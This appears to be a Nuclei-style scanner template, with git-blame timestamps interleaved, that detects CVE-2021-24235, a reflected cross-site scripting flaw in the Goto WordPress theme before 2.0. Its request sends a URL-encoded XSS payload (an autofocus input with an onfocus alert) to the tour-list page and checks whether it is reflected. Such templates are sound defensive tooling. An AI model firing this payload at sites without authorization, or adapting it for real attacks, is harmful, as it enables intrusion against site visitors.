2021-07-15 11:03:53 +00:00
id : CVE-2021-24235
info :
name : Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS)
author : daffainfo
severity : medium
reference : https://nvd.nist.gov/vuln/detail/CVE-2021-24235
2021-08-04 14:30:11 +00:00
tags : cve,cve2021,wordpress,xss,wp-theme
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.10
cve-id : CVE-2021-24235
cwe-id : CWE-79
description : "The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue."
2021-07-15 11:03:53 +00:00
requests :
- method : GET
path :
2021-08-04 16:02:50 +00:00
- '{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13'
2021-07-15 11:03:53 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-08-04 16:02:50 +00:00
- "input/Autofocus/%0D*/Onfocus=alert(123);"
- "goto-tour-list-js-extra"
2021-07-15 11:03:53 +00:00
part : body
2021-08-04 16:02:50 +00:00
condition : and
2021-07-15 11:03:53 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200